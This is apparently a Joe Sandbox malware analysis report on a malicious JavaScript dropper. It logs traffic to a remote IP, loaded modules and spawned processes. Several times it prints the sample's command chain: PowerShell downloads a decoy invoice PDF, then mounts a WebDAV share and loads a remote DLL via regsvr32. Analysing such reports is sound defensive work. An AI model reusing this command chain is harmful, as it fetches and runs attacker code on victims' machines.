    Source: Joe Sandbox ViewIP Address: 193.143.1.205 193.143.1.205
    Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
    Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49704 -> 193.143.1.205:80
    Source: global trafficHTTP traffic detected: GET /invoice.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 193.143.1.205Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: global trafficHTTP traffic detected: GET /invoice.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 193.143.1.205Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
    Source: wscript.exe, 00000001.00000003.1517004641.0000021CD13AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205/invoice.php
    Source: net.exe, 00000007.00000003.1616072931.000001D103A19000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.1619725052.000001D103A3C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.1619584929.000001D103A19000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.1615932604.000001D103A3A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.1619496596.000001D1039E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/
    Source: net.exe, 00000007.00000003.1616072931.000001D103A19000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.1619584929.000001D103A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/;
    Source: net.exe, 00000007.00000003.1616072931.000001D103A19000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.1619584929.000001D103A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/K
    Source: net.exe, 00000007.00000002.1619496596.000001D1039E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/d
    Source: net.exe, 00000007.00000002.1619496596.000001D1039E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/s
    Source: svchost.exe, 00000009.00000003.1700635846.000002C4106E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2801740788.000002C4106E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
    Source: svchost.exe, 00000009.00000002.2801488197.000002C410600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
    Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
    Source: svchost.exe, 00000009.00000003.1617863049.000002C410430000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:

    Spam, unwanted Advertisements and Ransom Demands

    barindex
    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6520, type: MEMORYSTR

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
    Source: 2330118683179179335.jsInitial sample: Strings found which are bigger than 50
    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winJS@27/60@2/2
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5aarv4lg.2vj.ps1Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 2330118683179179335.jsReversingLabs: Detection: 21%
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2144 --field-trial-handle=1548,i,11892106457076044815,771019309745034490,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2144 --field-trial-handle=1548,i,11892106457076044815,771019309745034490,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
